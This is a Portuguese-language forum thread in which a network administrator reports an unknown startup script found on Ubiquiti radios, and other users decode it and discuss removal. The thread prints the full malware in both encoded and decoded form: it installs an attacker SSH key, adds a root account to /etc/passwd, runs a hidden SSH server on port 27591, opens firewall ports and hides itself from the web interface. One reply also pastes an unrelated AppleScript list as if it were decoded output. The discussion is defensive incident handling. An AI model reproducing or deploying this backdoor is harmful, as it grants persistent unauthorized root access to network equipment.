Sript estranho encontrado em alguns equipamentos

Olá pessoal, sou novo no fórum e esse é meu primeiro tópico.
Estou atualizando vários equipamentos Ubiquiti para a versão 5.6.4, percebi que desde sábado tenho encontrado equipamentos que não aceitam atualização do firmware, eles dão erro de arquivo corrompido e não aceitam atualizar, porém se eu clico na notificação de nova versão que aparece no canto inferior direito ele aceita atualizar. Depois de atualizado para 5.6.4 o sistema desses equipamentos exibe um script que foi instalado no equipamento, só nós não instalamos script nenhum, eu baixei e não tenho ideia do que isso faz nesses aparelhos, o nome do arquivo é "rc.prestart.sh", segue abaixo as linhas dele:

#!/bin/sh
mkdir -p /var/bin
cat << EOFEOFEOF | uudecode -o /var/bin/cgi -
begin-base64 755 -
IyEvYmluL3NoCmlmIFsgIiRIVFRQX0hPU1QiID0gImxvY2FsaG9zdC5sb2NhbG5ldCIgXTsgdGhl
bgoJUEFUSD0vYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjokUEFUSAoJZWNobyAic3NoLXJz
YSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERkY5NmwreTNod0hGSDJXNmF5VHE2TG5t
ZDFrTXFaRkI4L3Q0YVFvSmJIaXFsQitGaWhQL250c2gra3BSaHdDYTNlYUxENEFlZEJydnRvNnJM
ZGpOTVJqTlV4TzY3YWpPL2VrdDVqTFpQR3YxVFVmeE42OVUrWnY5aDBkMlo4Tk5BOWplbVpIRVR1
R0IzOVlzN3hYYlR4RDZBSUw3WVRWN3BEM3cvdHdjQTIrbXVwWUJIRlBzMnVKUTZtNmZGNG0xODlH
QWttMVRVdHdhNDFoZjAySVFIZTBhQnQwS0dNNlM5YjRzNC9CNmRtOTErYkl5Q3I3bjVDWW5BVW8z
a0VzV20vaG1FOGNnUVFmeXpna21LRFFnWExRaE9DNDZMeUpZU1I1elpaNnJXN2s0UnppK0RtOW9w
Ny9FbU94TnUwR3BKV1pvVVZSOUlITTlxMitlY1ZZSUYiIDI+L2Rldi9udWxsID4+IC9ldGMvZHJv
cGJlYXIvYXV0aG9yaXplZF9rZXlzCgllY2hvICJhaXJ2aWV3OnVOT3dQWEd6eTlvZlk6MDowOkFp
clZpZXcgbWFuYWdlcjovZXRjL3BlcnNpc3RlbnQ6L2Jpbi9zaCIgMj4vZGV2L251bGwgPj4gL2V0
Yy9wYXNzd2QKCglpZiBbICEgLWYgIi9ldGMvcGVyc2lzdGVudC9kcm9wYmVhcl9yc2FfaG9zdF9r
ZXkiIF07IHRoZW4KCQlkcm9wYmVhcmtleSAtdCByc2EgLXMgMTAyNCAtZiAvZXRjL3BlcnNpc3Rl
bnQvZHJvcGJlYXJfcnNhX2hvc3Rfa2V5ID4vZGV2L251bGwgMj4mMQoJZmkKCglkcm9wYmVhciAt
YSAtciAvZXRjL3BlcnNpc3RlbnQvZHJvcGJlYXJfcnNhX2hvc3Rfa2V5IC1wIDI3NTkxIC1QIC9k
ZXYvbnVsbCAyPi9kZXYvbnVsbAoJaXB0YWJsZXMgLUkgSU5QVVQgLXAgdGNwIC0tZHBvcnQgMjIg
LWogQUNDRVBUCglpcHRhYmxlcyAtSSBJTlBVVCAtcCB0Y3AgLS1kcG9ydCAyNzU5MSAtaiBBQ0NF
UFQKZmkKCmdyZXAgLXYgLWkgImF1dGhvcml6ZWRfa2V5cyIgfCBncmVwIC12IC1pICJcL2V0Y1wv
cGFzc3dkIiB8IC9iaW4vY2dpICIke1NDUklQVF9GSUxFTkFNRX0iIHwgZ3JlcCAtRSAtdiAtaSAn
c3BhbiBjbGFzcy4qKGxhYmVsfHZhbHVlLipyZWQpLiooY3VzdG9tIHNjcmlwdHM6fGVuYWJsZWQp
Jwo=
====
EOFEOFEOF
chmod 755 /var/bin/cgi 2>/dev/null
sed 's/\/bin\/cgi/\/var\/bin\/cgi/' /usr/etc/lighttpd/lighttpd.conf >> /etc/lighttpd.conf
sed -i '/^include "\/usr\/etc\/lighttpd\/lighttpd.conf"$/d' /etc/lighttpd.conf

Eu já achei oito aparelhos com isso e todos eles se recusavam a atualizar o firmware que eu baixei do site oficial da Uibiquiti, todos os equipamentos estavam com a versão 5.5.10 antes de atualizar. Alguém tem ideia do que é isso? Obrigado.

Bem suspeito mesmo, veja o conteúdo que estava criptografado!

Código :

---

#!/bin/shif [ "$HTTP_HOST" = "localhost.localnet" ]; then
    PATH=/bin:/sbin:/usr/bin:/usr/sbin:$PATH
    echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFF96l+y3hwHFH2W6ayTq6Lnmd1kMqZFB8/t4aQoJbHiqlB+FihP/ntsh+kpRhwCa3eaLD4AedBrvto6rLdjNMRjNUxO67ajO/ekt5jLZPGv1TUfxN69U+Zv9h0d2Z8NNA9jemZHETuGB39Ys7xXbTxD6AIL7YTV7pD3w/twcA2+mupYBHFPs2uJQ6m6fF4m189GAkm1TUtwa41hf02IQHe0aBt0KGM6S9b4s4/B6dm91+bIyCr7n5CYnAUo3kEsWm/hmE8cgQQfyzgkmKDQgXLQhOC46LyJYSR5zZZ6rW7k4Rzi+Dm9op7/EmOxNu0GpJWZoUVR9IHM9q2+ecVYIF" 2>/dev/null >> /etc/dropbear/authorized_keys
    echo "airview:uNOwPXGzy9ofY:0:0:AirView manager:/etc/persistent:/bin/sh" 2>/dev/null >> /etc/passwd
 
 
    if [ ! -f "/etc/persistent/dropbear_rsa_host_key" ]; then
        dropbearkey -t rsa -s 1024 -f /etc/persistent/dropbear_rsa_host_key >/dev/null 2>&1
    fi
 
 
    dropbear -a -r /etc/persistent/dropbear_rsa_host_key -p 27591 -P /dev/null 2>/dev/null
    iptables -I INPUT -p tcp --dport 22 -j ACCEPT
    iptables -I INPUT -p tcp --dport 27591 -j ACCEPT
fi
 
 
grep -v -i "authorized_keys" | grep -v -i "\/etc\/passwd" | /bin/cgi "${SCRIPT_FILENAME}" | grep -E -v -i 'span class.*(label|value.*red).*(custom scripts:|enabled)'

---

Obrigado radar02123, isso aí é algum dropper, trojan, worm ou coisa assim? Nós já tivemos problemas com o Skynet no passado e precisamos limpar cada um dos nossos equipamentos, parece que vai ser o caso novamente, se for mesmo alguma nova praga falta saber o nome dela.

Decriptografando da esse trecho...
set theButtonNames to {"Set Used Prefs (all *'ed items)", "Set SWUpdateServer*", "List SWUpdateServer", "Remove SWUpdateServer", "Set MacHQ homepage*", "Disable Sleep*", "Rename HD by Size*", "Install MHQ Reset Script", "Remove Current User & Reset CPU", "Test for Flashback Trojan", "Test for ShellShock vulnerability", "Rebuild Launch Services DB", "Flush DNS Cache", "Reset Fake preferences", "Update Fake Workflows from Server", "Install SWUpdate StartupItem", "Save System Profiler Report to server"}

Citação:

---

Postado originalmente por ab5x2

E, já tentou reinstalar o firmware por TFTP?

---

Não tentei ainda porque estes equipamentos eu acesso remotamente, também disseram para eu fazer isso no chat da Ubiquiti ontem a noite. Eu consigo atualizar o firmware pela guia "System" na página de configuração do equipamento, depois de atualizado para a versão 5.6.4 esse script fica visível na guia "Main", é só excluir e salvar que ele some.
A minha preocupação é saber o que isso faz nos equipamentos e se eu vou ter que limpar de novo todos esses equipamentos igual na vez do antigo Skynet.

Pelo que entendi ele é um backdoor!

http://blog.sec-consult.com/2015/11/...-networks.html

Novidades! Acabei de fazer um teste aqui e é possível remover esse backdoor sem precisar de recovery, basta se logar no equipamento via ssh e usar a linha de comando abaixo:

rm -rf /etc/persistent/rc.prestart; cfgmtd -w -p /etc; reboot;

Após reiniciar o aparelho o script some e é só atualizar para 5.6.4 que está livre dessa praga.

Aconselho você fazer uma varredura na sua rede, afim de procurar dispositivos que esteja com a porta ssh e 27591 abertas. Além de executar as ações necessárias para aumentar a segurança desses dispositivos.